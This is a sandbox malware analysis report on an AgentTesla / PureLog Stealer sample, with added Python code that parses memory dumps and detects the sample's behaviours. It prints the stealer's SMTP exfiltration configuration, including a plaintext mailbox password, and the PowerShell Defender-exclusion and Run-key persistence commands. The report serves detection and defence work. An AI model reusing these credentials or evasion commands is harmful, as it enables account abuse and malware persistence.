Windows Analysis Report
PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe

Overview

General Information

Sample name: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe
  (renamed because original name is a hash value)
Original sample name: PR 2500006515 972 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe
Analysis ID: 1520405
MD5: 0362b41458cd2b19f542e3f3f040c547
SHA1: 210e4b23a4ceba122fb66f6c0ed92a534c852b57
SHA256: f3dd8124dc20b5dbe2afde3eaa092c05e1eb0fae8fe16aaacfa9e0d5213f4117
Tags: exe, user-abuse_ch

Detection

AgentTesla, PureLog Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Yara detected AntiVM3
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Contains functionality to log keystrokes (.Net Source)
Contains functionality to register a low level keyboard hook
Hides that the sample has been downloaded from the Internet (zone.identifier)
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates processes with suspicious names
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Outbound SMTP Connections
Uses 32bit PE files
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  (classification diagram not reproduced in this text export)

Process Tree

  • System is w10x64
  • ctsdvwT.exe (PID: 7060 cmdline: "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe" MD5: 0362B41458CD2B19F542E3F3F040C547)
    • ctsdvwT.exe (PID: 3684 cmdline: "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe" MD5: 0362B41458CD2B19F542E3F3F040C547)
  • ctsdvwT.exe (PID: 6840 cmdline: "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe" MD5: 0362B41458CD2B19F542E3F3F040C547)
    • ctsdvwT.exe (PID: 1016 cmdline: "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe" MD5: 0362B41458CD2B19F542E3F3F040C547)
    • ctsdvwT.exe (PID: 2676 cmdline: "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe" MD5: 0362B41458CD2B19F542E3F3F040C547)
  • cleanup
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Agent Tesla (extracted from 6.2.ctsdvwT.exe.400000.0.unpack, see AV Detection below):
{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.yildiztepeenerji.com.tr", "Username": "muhasebe@yildiztepeenerji.com.tr", "Password": "na1tyYbc3"}
Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000005.00000002.1877432434.0000000003D43000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000005.00000002.1877432434.0000000003D43000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000000.00000002.1760927897.00000000053C0000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
00000006.00000002.1928113926.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000006.00000002.1928113926.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
(5 of 24 entries shown)
Unpacked PEs

Source | Rule | Description | Author | Strings
0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.2df3adc.0.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
5.2.ctsdvwT.exe.2cc398c.0.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.53c0000.5.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.53c0000.5.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
6.2.ctsdvwT.exe.400000.0.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
(5 of 34 entries shown)
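A parser for the memory-dump names in the Source column above, to decide which dump is worth pulling for static work. This is an added example, not Joe Sandbox tooling. The field layout it assumes (process index, phase, opaque, base address, page protection, opaque, region type, opaque) is inferred from the values on this page: the sample's own image at phase 0 is tagged 00000002/01000000 (PAGE_READONLY, MEM_IMAGE), while the dump the configuration was extracted from, 00000006.00000002.1928113926.0000000000402000.00000040.00000400.00020000.00000000.sdmp, is tagged 0x40/0x20000 (PAGE_EXECUTE_READWRITE, MEM_PRIVATE) at the first section of a 32-bit image base, which is what a payload written into a process rather than loaded from disk looks like. The PAGE_* and MEM_* values are the Windows constants; the three fields whose meaning the page does not establish are kept as opaque strings.

```python
"""Parse the memory-dump names in the Source column of the Yara tables above and pick
the dumps worth pulling for static work."""
from __future__ import annotations
from dataclasses import dataclass

PAGE_FLAGS = {            # Windows PAGE_* protection constants
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
    0x100: "PAGE_GUARD", 0x200: "PAGE_NOCACHE", 0x400: "PAGE_WRITECOMBINE",
}
MEM_TYPES = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}
WRITABLE_EXEC = 0x40 | 0x80


@dataclass(frozen=True)
class Dump:
    process: int    # Joe Sandbox process index, the "6" in 6.2.ctsdvwT.exe...; hex (0000000A = 10)
    phase: int      # 0 at process start, 2 at end of analysis (inferred from this report)
    base: int       # region base address
    protect: int    # PAGE_* protection of the region
    mem_type: int   # MEM_PRIVATE / MEM_MAPPED / MEM_IMAGE
    opaque: tuple   # fields 3, 6 and 8, whose meaning this report does not establish

    def protect_names(self) -> str:
        return "|".join(n for bit, n in PAGE_FLAGS.items() if self.protect & bit) or hex(self.protect)

    def type_name(self) -> str:
        return MEM_TYPES.get(self.mem_type, hex(self.mem_type))

    def is_injected_code(self) -> bool:
        """Private (not file-backed) memory that is writable and executable: what an
        unpacked payload written into a process looks like, as opposed to a loaded image."""
        return self.mem_type == 0x20000 and bool(self.protect & WRITABLE_EXEC)


def parse_dump(name: str) -> Dump:
    if not name.endswith(".sdmp"):
        raise ValueError(f"not a memory dump name: {name}")
    fields = name[: -len(".sdmp")].split(".")
    if len(fields) != 8:
        raise ValueError(f"expected 8 dot-separated fields, got {len(fields)}: {name}")
    return Dump(process=int(fields[0], 16), phase=int(fields[1], 16), base=int(fields[3], 16),
                protect=int(fields[4], 16), mem_type=int(fields[6], 16),
                opaque=(fields[2], fields[5], fields[7]))


def payload_candidates(rows: list[tuple[str, str]]) -> list[tuple[str, list[str]]]:
    """Group (dump name, rule) rows by dump, keep dumps that look like injected code,
    and order them most-rules-first so the richest candidate comes out on top."""
    by_dump: dict[str, list[str]] = {}
    for name, rule in rows:
        by_dump.setdefault(name, []).append(rule)
    hits = [(n, r) for n, r in by_dump.items() if parse_dump(n).is_injected_code()]
    return sorted(hits, key=lambda nr: (-len(nr[1]), nr[0]))


# The five memory-dump rows shown in the Yara table above.
ROWS = [
    ("00000005.00000002.1877432434.0000000003D43000.00000004.00000800.00020000.00000000.sdmp",
     "JoeSecurity_CredentialStealer"),
    ("00000005.00000002.1877432434.0000000003D43000.00000004.00000800.00020000.00000000.sdmp",
     "JoeSecurity_AgentTesla_1"),
    ("00000000.00000002.1760927897.00000000053C0000.00000004.08000000.00040000.00000000.sdmp",
     "JoeSecurity_PureLogStealer"),
    ("00000006.00000002.1928113926.0000000000402000.00000040.00000400.00020000.00000000.sdmp",
     "JoeSecurity_CredentialStealer"),
    ("00000006.00000002.1928113926.0000000000402000.00000040.00000400.00020000.00000000.sdmp",
     "JoeSecurity_AgentTesla_1"),
]

if __name__ == "__main__":
    for name, rules in payload_candidates(ROWS):
        d = parse_dump(name)
        print(f"process {d.process} phase {d.phase} base {d.base:#x} "
              f"{d.protect_names()} {d.type_name()} <- {', '.join(rules)}")
```

On this report's rows only the process-6 dump at 0x402000 survives the filter: the process-5 dump is read/write heap and the process-0 dump is a mapped section, so neither is the executing payload even though both match the same Yara rules.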

Sigma Overview

System Summary

Source: Process started
Author: Florian Roth (Nextron Systems)
Data:
  Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe"
  CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe"
  CommandLine|base64offset|contains: ~2yzw
  Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  ParentCommandLine: "C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe"
  ParentImage: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe
  ParentProcessId: 6752
  ParentProcessName: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe
  ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe"
  ProcessId: 6980
  ProcessName: powershell.exe

Source: Registry Key set
Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
Data:
  Details: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe
  EventID: 13
  EventType: SetValue
  Image: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe
  ProcessId: 7128
  TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ctsdvwT

Source: Process started
Author: Florian Roth (Nextron Systems)
Data: the same powershell.exe event as the first entry (ProcessId 6980, ParentProcessId 6752), matched by a second rule

Source: Network Connection
Author: frack113
Data:
  DestinationIp: 77.245.148.65
  DestinationIsIpv6: false
  DestinationPort: 587
  EventID: 3
  Image: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe
  Initiated: true
  ProcessId: 7128
  Protocol: tcp
  SourceIp: 192.168.2.4
  SourceIsIpv6: false
  SourcePort: 50358

Source: Process started
Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)
Data: the same powershell.exe event as the first entry (ProcessId 6980, ParentProcessId 6752), matched by a third rule

No Suricata rule has matched
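The three behaviours those Sigma hits key on (a Defender exclusion added through PowerShell, a Run-key write, an outbound SMTP connection), as detection logic in Python. This is an added example, not Joe Sandbox or Sigma code. It runs over constructed Sysmon-style events whose PIDs, paths and destination mirror the entries above (sample.exe stands in for the long sample name); the `base64offset` helper re-implements the Sigma modifier of that name and is extended with a UTF-16LE option so that an `-EncodedCommand` payload is also caught, which the ASCII form alone is not. Two details from the entries matter when porting this to real telemetry: the 32-bit sample's call to `System32\powershell.exe` lands in `SysWOW64\powershell.exe` under WoW64 redirection, so the image match must not be pinned to one path, and the Run-key write comes from the sample process (7128), not from PowerShell.

```python
"""Detection logic for the three behaviours the Sigma hits above key on, run over
constructed Sysmon-style events (not telemetry taken from the report)."""
from __future__ import annotations
import base64
import re

POWERSHELL = {"powershell.exe", "pwsh.exe"}
MAIL_CLIENTS = {"outlook.exe", "thunderbird.exe"}   # allowed to talk SMTP
SMTP_PORTS = {25, 465, 587}
MP_CMDLETS = ("Add-MpPreference", "Set-MpPreference")
RUN_KEY = re.compile(r"\\CurrentVersion\\Run(Once)?\\", re.IGNORECASE)


def base64offset(needle: str, utf16le: bool = False) -> list[str]:
    """The three Base64 substrings that encode `needle` at byte alignments 0, 1 and 2,
    computed the way Sigma's `base64offset` modifier does.  utf16le=True encodes the
    needle as PowerShell -EncodedCommand does (Sigma keeps that in a separate modifier)."""
    raw = needle.encode("utf-16-le" if utf16le else "ascii")
    starts = (0, 2, 3)        # leading chars that mix in the 0/1/2 padding bytes
    ends = (None, -3, -2)     # trailing chars that mix in whatever follows the needle
    out = []
    for shift in range(3):
        enc = base64.b64encode(b" " * shift + raw).decode()
        out.append(enc[starts[shift]:ends[(len(raw) + shift) % 3]])
    return out


def defender_exclusion(cmdline: str) -> str | None:
    """How a Defender exclusion is being added: 'plain', 'base64', 'base64-utf16le' or None."""
    low = cmdline.lower()
    if any(c.lower() in low for c in MP_CMDLETS) and "-exclusion" in low:
        return "plain"
    for wide in (False, True):            # Base64 is case-sensitive: no lower() here
        for cmdlet in MP_CMDLETS:
            if any(p in cmdline for p in base64offset(cmdlet, wide)):
                return "base64-utf16le" if wide else "base64"
    return None


def analyze(events: list[dict]) -> list[tuple[str, int]]:
    """(finding, ProcessId) pairs, one per matching event, in input order."""
    findings = []
    for ev in events:
        pid, image = ev["ProcessId"], ev["Image"].rsplit("\\", 1)[-1].lower()
        kind = ev["EventType"]
        if kind == "ProcessCreate" and image in POWERSHELL:
            how = defender_exclusion(ev["CommandLine"])
            if how:
                findings.append((f"defender-exclusion:{how}", pid))
        elif kind == "RegistrySetValue" and RUN_KEY.search(ev["TargetObject"]):
            findings.append((f"run-key-persistence:{ev['Details']}", pid))
        elif kind == "NetworkConnect" and ev["DestinationPort"] in SMTP_PORTS \
                and image not in MAIL_CLIENTS:
            findings.append((f"outbound-smtp:{ev['DestinationIp']}:{ev['DestinationPort']}", pid))
    return findings


# Constructed events.  PIDs 6980/7128, the dropped path and the destination mirror the
# report's Sigma hits; sample.exe stands in for the long sample name.  The image is the
# SysWOW64 PowerShell because the 32-bit sample's call to System32 is redirected under WoW64.
PS32 = "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe"
SAMPLE = "C:\\Users\\user\\Desktop\\sample.exe"
DROPPED = "C:\\Users\\user\\AppData\\Roaming\\ctsdvwT\\ctsdvwT.exe"
ENCODED = base64.b64encode(f"Add-MpPreference -ExclusionPath '{DROPPED}'".encode("utf-16-le")).decode()
EVENTS = [
    {"EventType": "ProcessCreate", "ProcessId": 6980, "Image": PS32,
     "CommandLine": f'"{PS32}" Add-MpPreference -ExclusionPath "{SAMPLE}"'},
    {"EventType": "ProcessCreate", "ProcessId": 7001, "Image": PS32,
     "CommandLine": f'"{PS32}" -NoP -W Hidden -EncodedCommand {ENCODED}'},
    {"EventType": "ProcessCreate", "ProcessId": 7002, "Image": PS32,
     "CommandLine": f'"{PS32}" Get-MpPreference'},                      # benign: no exclusion
    {"EventType": "RegistrySetValue", "ProcessId": 7128, "Image": SAMPLE,
     "TargetObject": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\ctsdvwT",
     "Details": DROPPED},
    {"EventType": "NetworkConnect", "ProcessId": 7128, "Image": SAMPLE,
     "DestinationIp": "77.245.148.65", "DestinationPort": 587},
    {"EventType": "NetworkConnect", "ProcessId": 4242,                  # benign: a mail client
     "Image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE",
     "DestinationIp": "192.0.2.25", "DestinationPort": 587},
]

if __name__ == "__main__":
    for finding, pid in analyze(EVENTS):
        print(f"pid {pid}: {finding}")
```

The SMTP check is deliberately coarse (any non-mail-client image reaching 25/465/587); in production it would be scoped by destination reputation and by the process's code-signing state, otherwise every line-of-business tool that sends notifications fires it.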

AV Detection

Source: 6.2.ctsdvwT.exe.400000.0.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.yildiztepeenerji.com.tr", "Username": "muhasebe@yildiztepeenerji.com.tr", "Password": "na1tyYbc3"}
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | ReversingLabs: Detection: 71%
Source: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | ReversingLabs: Detection: 71%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.9% probability
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Joe Sandbox ML: detected
Source: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Joe Sandbox ML: detected
Source: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: System.Management.Automation.pdb-2476756634-1002_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer325DA9 | source: powershell.exe, 00000001.00000002.1778310849.0000000007981000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb | source: powershell.exe, 00000001.00000002.1777916558.0000000007926000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: LrBtUp.pdb | source: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe, ctsdvwT.exe.4.dr
Source: Binary string: LrBtUp.pdbSHA256 | source: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe, ctsdvwT.exe.4.dr
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbd | source: powershell.exe, 00000001.00000002.1780173033.0000000008832000.00000004.00000020.00020000.00000000.sdmp
Networking

Source: global traffic | TCP traffic: 192.168.2.4:50358 -> 77.245.148.65:587 (listed once under non-standard ports and once under SMTP use)
Source: Joe Sandbox View | ASN Name: NIOBEBILISIMHIZMETLERITR NIOBEBILISIMHIZMETLERITR
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (reported 4 times)
Source: global traffic | DNS traffic detected: DNS query: 241.42.69.40.in-addr.arpa
Source: global traffic | DNS traffic detected: DNS query: 26.165.165.52.in-addr.arpa
Source: global traffic | DNS traffic detected: DNS query: mail.yildiztepeenerji.com.tr
Source: global traffic | DNS traffic detected: DNS query: _kerberos._tcp.dc._msdcs.yildiztepeenerji.com.tr
Source: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe, 00000004.00000002.4186061604.0000000002BA9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://mail.yildiztepeenerji.com.tr
Source: powershell.exe, 00000001.00000002.1774607096.0000000005FF8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000001.00000002.1762367646.00000000050E5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.1762367646.00000000050E5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe, 00000000.00000002.1755288317.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1762367646.0000000004F91000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 00000005.00000002.1867946503.0000000002CFB000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 0000000A.00000002.1948373451.0000000002A19000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.1762367646.00000000050E5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000001.00000002.1762367646.00000000050E5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe, 00000000.00000002.1756670007.0000000003E37000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 00000005.00000002.1877432434.0000000003D43000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 00000005.00000002.1877432434.0000000003CC9000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 00000006.00000002.1928113926.0000000000402000.00000040.00000400.00020000.00000000.sdmp, ctsdvwT.exe, 0000000A.00000002.1963628997.0000000003A28000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://account.dyn.com/
Source: powershell.exe, 00000001.00000002.1762367646.0000000004F91000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000001.00000002.1774607096.0000000005FF8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000001.00000002.1774607096.0000000005FF8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000001.00000002.1774607096.0000000005FF8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000001.00000002.1762367646.00000000050E5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.1774607096.0000000005FF8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.3e37f60.1.raw.unpack, R1W.cs | .Net Code: uBa63eXnQW
Source: 0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.3e72b80.2.raw.unpack, R1W.cs | .Net Code: uBa63eXnQW
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Code function: 6_2_05C6EE00 SetWindowsHookExA 0000000D,00000000,?,?,?,?,?,?,?,?,?,05C6FC70,00000000,00000000 (idHook 0x0D is WH_KEYBOARD_LL, a global low-level keyboard hook; the hMod of 0 and the callback at 05C6FC70 in the process's own JIT-compiled code are what the "Installs a global keyboard hook" signature keys on)
Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe
Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Window created: window name: CLIPBRDWNDCLASS

System Summary

Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen | type: UNPACKEDPE | Sources:
  6.2.ctsdvwT.exe.400000.0.unpack
  10.2.ctsdvwT.exe.3a630e0.3.unpack
  10.2.ctsdvwT.exe.3a630e0.3.raw.unpack
  10.2.ctsdvwT.exe.3a284c0.4.raw.unpack
  0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.3e72b80.2.raw.unpack
  5.2.ctsdvwT.exe.3cc9990.1.unpack
  0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.3e72b80.2.unpack
  0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.3e37f60.1.unpack
  5.2.ctsdvwT.exe.3cc9990.1.raw.unpack
  10.2.ctsdvwT.exe.3a284c0.4.unpack
  0.2.PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe.3e37f60.1.raw.unpack
Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Code functions (process index 0): 0_2_0127DC7C
Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Code functions (process index 4): 4_2_00EC9760, 4_2_00ECC9D8, 4_2_00EC4AA8, 4_2_00EC3E90, 4_2_00EC41D8, 4_2_00ECE76F, 4_2_05686E05, 4_2_05681768, 4_2_05688108, 4_2_05688102, 4_2_05688DD0, 4_2_05682F10, 4_2_056809C0, 4_2_05682828
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Code functions (process index 5): 5_2_02C8DC7C
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Code functions (process index 6): 6_2_026F9638, 6_2_026F4AA8, 6_2_026FC8B0, 6_2_026F8E78, 6_2_026F3E90, 6_2_026F41D8, 6_2_05C60448, 6_2_05C611F0, 6_2_05C62D98, 6_2_05C622B0, 6_2_05C67F88, 6_2_05C67F20, 6_2_026FAF6F
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Code functions (process index 10): 10_2_0100DC7C
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Code functions (process index 12): 12_2_03089638, 12_2_03084AA8, 12_2_0308C8B0, 12_2_03083E90, 12_2_030841D8, 12_2_068B0448, 12_2_068B11F0, 12_2_068B6C5C, 12_2_068B2D98, 12_2_068B22B0, 12_2_068B7F88, 12_2_068B7F82, 12_2_068B8C76
